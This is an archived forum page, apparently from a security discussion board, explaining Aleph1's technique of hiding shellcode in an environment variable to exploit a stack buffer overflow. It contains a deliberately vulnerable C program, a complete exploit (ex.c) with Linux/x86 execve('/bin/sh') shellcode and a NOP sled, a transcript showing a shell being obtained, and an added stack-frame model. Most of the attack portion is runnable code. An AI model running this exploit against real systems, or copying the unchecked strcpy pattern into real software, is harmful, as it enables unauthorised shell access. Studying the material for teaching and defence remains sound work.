<HTML>
<HEAD>
<meta name="Phorum Version" content="3.1">
<meta name="Phorum DB" content="mysql">
<meta name="PHP Version" content="4.0.0">
<TITLE> Shellcode technique discussion, continued (3)</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" ALINK="#FF0000" VLINK="#330000">
Shellcode technique discussion, continued (3)
<BR>
<BR>--------------------------------------------------------------------------------
<BR>
<BR>
<BR>
<BR>Aleph1's approach is to put the shellcode in an environment variable, which the
<BR>vulnerable program inherits, and to use the address of that environment variable
<BR>as the return address. That way a buffer of only 24 bytes is enough to overwrite
<BR>the return address, and the arguments do not have to be changed.
<BR>
<BR>Avoiding any change to the arguments entirely is impossible: even with a 24-byte
<BR>overwrite, the terminating '\0' that strcpy() appends still lands on the byte
<BR>immediately after the return address, which is the low byte of func()'s first
<BR>argument. The method still has its merits, though: you need not worry much about
<BR>the buffer size, because the environment variable can be made fairly large, filled
<BR>with NOPs and followed by the shellcode, so the return address only has to land
<BR>somewhere in the NOP sled.
<BR>The overflow.c below is slightly modified by me; ex.c is taken from Aleph1's
<BR>article. You can see the full text at http://www.phrack.com/search.phtml?view&article=p49-14;
<BR>it is fairly long, so I will not paste it here.
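<BR>
<BR>To make the point about the terminator concrete, here is an added example (not
<BR>code from the original article or from Aleph1's ex.c): it rebuilds the 24-byte
<BR>overwrite string the way ex.c does and copies it into a mock of func()'s stack
<BR>frame, so you can see exactly which bytes strcpy() changes. The frame layout is
<BR>an assumption taken from the experiment below (16 A's are enough to crash, so
<BR>buffer[16] sits directly below the saved ebp): buffer, saved ebp, return address,
<BR>then the first argument. 0xbffffd38 is the address printed in the transcript; the
<BR>other frame values are made-up placeholders. 32-bit little-endian x86 is assumed.
<BR>

```c
/* Added example, not from the original article or Aleph1's ex.c: models what
 * strcpy(buffer, ptr) in func() does to its own stack frame when ptr is the
 * 24-byte string ex.c builds. The frame layout (buffer, saved ebp, return
 * address, first argument) and 32-bit little-endian x86 are assumptions. */
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Mock of func()'s frame: the 16-byte buffer, then what the prologue and the
 * caller pushed above it. No padding: every field is 4-byte aligned. */
struct frame {
    char     buffer[16];   /* char buffer[16] = "" */
    uint32_t saved_ebp;    /* main()'s ebp, pushed by func()'s prologue */
    uint32_t ret;          /* return address back into main() */
    uint32_t arg_ptr;      /* func()'s first argument, ptr (= argv[1]) */
};

/* 1 if every byte of addr is non-zero, so strcpy() copies all four of them. */
int addr_nul_free(uint32_t addr) {
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0) return 0;
    return 1;
}

/* Fill out[0..bsize) with little-endian copies of addr, like ex.c's
 * "*(addr_ptr++) = addr" loop, then NUL-terminate (out must hold bsize+1).
 * Returns bsize, or 0 if addr has a zero byte or bsize is not a multiple of 4. */
size_t build_overwrite(unsigned char *out, size_t bsize, uint32_t addr) {
    if (bsize % 4 != 0 || !addr_nul_free(addr)) return 0;
    for (size_t i = 0; i < bsize; i += 4) {
        out[i]     = (unsigned char)(addr & 0xffu);
        out[i + 1] = (unsigned char)((addr >> 8) & 0xffu);
        out[i + 2] = (unsigned char)((addr >> 16) & 0xffu);
        out[i + 3] = (unsigned char)((addr >> 24) & 0xffu);
    }
    out[bsize] = '\0';
    return bsize;
}

/* Byte-for-byte model of strcpy(f->buffer, src): copies up to and including
 * the first '\0' with no regard for the 16-byte limit, exactly like the real
 * call. Returns the offset where the terminator landed (24 for ex.c's string:
 * the byte right after the return address). */
size_t strcpy_into_frame(struct frame *f, const unsigned char *src) {
    unsigned char *dst = (unsigned char *)f;
    size_t i = 0;
    while (src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}

/* Run the article's scenario on a frame holding the given original values and
 * return the frame as strcpy() leaves it. */
struct frame overflow_frame(uint32_t egg_addr, uint32_t orig_ebp,
                            uint32_t orig_ret, uint32_t orig_arg) {
    struct frame f;
    unsigned char payload[24 + 1];
    memset(f.buffer, 0, sizeof f.buffer);
    f.saved_ebp = orig_ebp;
    f.ret = orig_ret;
    f.arg_ptr = orig_arg;
    if (build_overwrite(payload, 24, egg_addr) == 24)
        strcpy_into_frame(&f, payload);
    return f;
}

int main(void) {
    /* 0xbffffd38 is the address from the transcript; the other three are
     * made-up placeholders for what the frame held before the copy. */
    struct frame f = overflow_frame(0xbffffd38u, 0xbffffe08u, 0x080484c2u, 0xbffffef0u);
    printf("saved ebp = 0x%08" PRIx32 "\n", f.saved_ebp);
    printf("ret       = 0x%08" PRIx32 "\n", f.ret);
    printf("arg ptr   = 0x%08" PRIx32 " (low byte zeroed by the terminator)\n", f.arg_ptr);
    return 0;
}
```

<BR>The saved ebp and the return address both end up holding the egg address, and
<BR>only the low byte of ptr is touched. addr_nul_free() is the check to run on any
<BR>candidate address first: a zero byte anywhere in it stops strcpy() before the
<BR>return address is reached.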
<BR>
<BR>[tt@hell tt]$ ./overflow `perl -e 'print "A"x15'`
<BR>AAAAAAAAAAAAAAA
<BR>[tt@hell tt]$ ./overflow `perl -e 'print "A"x16'`
<BR>AAAAAAAAAAAAAAAA
<BR>Segmentation fault (core dumped)
<BR>[tt@hell tt]$ ./ex1
<BR>Using address: 0xbffffd38
<BR>
<BR>bash$ exit
<BR>
<BR>/* gcc -o overflow overflow.c */
<BR>#include <stdio.h>
<BR>#include <string.h>
<BR>
<BR>/* Deliberately vulnerable: strcpy() copies argv[1] into a 16-byte buffer with
<BR> no length check, so anything longer runs into the saved ebp and the return
<BR> address stored above the buffer. */
<BR>int func ( char * ptr )
<BR> {
<BR> char buffer[ 16 ] = "";
<BR> strcpy( buffer, ptr );
<BR> puts( ptr );
<BR> return 0;
<BR> }
<BR>
<BR>int main ( int argc, char * argv[] )
<BR>{
<BR> if ( argc > 1 )
<BR> {
<BR> func( argv[1] );
<BR> }
<BR> else
<BR> {
<BR> puts( "Argv[1] needed!" );
<BR> }
<BR> return 0;
<BR>}
<BR>
<BR>/* gcc -o ex ex.c (32-bit x86 only: the address arithmetic and get_esp() assume it) */
<BR>
<BR>#include <stdio.h>
<BR>#include <stdlib.h>
<BR>#include <string.h>
<BR>#include <unistd.h>
<BR>
<BR>#define DEFAULT_OFFSET 0
<BR>#define DEFAULT_BUFFER_SIZE 24
<BR>#define DEFAULT_EGG_SIZE 2048
<BR>#define NOP 0x90
<BR>
<BR>/* Linux/x86 execve("/bin/sh") shellcode from Aleph1's article. It contains no
<BR> zero byte, which matters because it travels inside a C string. */
<BR>char shellcode[] =
<BR> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
<BR> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
<BR> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
<BR>
<BR>/* Current stack pointer. The child's environment sits near the same place,
<BR> so this is the starting guess for the egg's address. */
<BR>unsigned long get_esp(void) {
<BR> unsigned long esp;
<BR> __asm__ volatile ("movl %%esp, %0" : "=r" (esp));
<BR> return esp;
<BR>}
<BR>
<BR>int main(int argc, char *argv[]) {
<BR> char *buffer, *ptr, *egg;
<BR> long *addr_ptr, addr;
<BR> int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
<BR> int i, eggsize=DEFAULT_EGG_SIZE;
<BR>
<BR> if (argc > 1) bsize = atoi(argv[1]);
<BR> if (argc > 2) offset = atoi(argv[2]);
<BR> if (argc > 3) eggsize = atoi(argv[3]);
<BR>
<BR> /* One extra byte so the overwrite string can be NUL-terminated. */
<BR> if (!(buffer = malloc(bsize + 1))) {
<BR> printf("Can't allocate memory.\n");
<BR> exit(0);
<BR> }
<BR> if (!(egg = malloc(eggsize))) {
<BR> printf("Can't allocate memory.\n");
<BR> exit(0);
<BR> }
<BR>
<BR> addr = get_esp() - offset;
<BR> printf("Using address: 0x%lx\n", addr);
<BR>
<BR> /* Fill the whole argument with copies of the guessed address; the copy that
<BR> lands on the return address sends func() into the NOP sled. */
<BR> ptr = buffer;
<BR> addr_ptr = (long *) ptr;
<BR> for (i = 0; i < bsize; i+=4)
<BR> *(addr_ptr++) = addr;
<BR> buffer[bsize] = '\0';
<BR>
<BR> /* Egg = NOP sled followed by the shellcode, NUL-terminated. */
<BR> ptr = egg;
<BR> for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
<BR> *(ptr++) = NOP;
<BR>
<BR> for (i = 0; i < strlen(shellcode); i++)
<BR> *(ptr++) = shellcode[i];
<BR>
<BR> egg[eggsize - 1] = '\0';
<BR>
<BR> /* "EGG=" replaces the first four NOPs; putenv() hands the sled to the child. */
<BR> memcpy(egg,"EGG=",4);
<BR> putenv(egg);
<BR> execl( "/home/tt/overflow", "overflow", buffer, (char *) 0 );
<BR> perror("execl");
<BR> return 1;
<BR>}
<BR>
<BR>
<BR>
</body>
</html>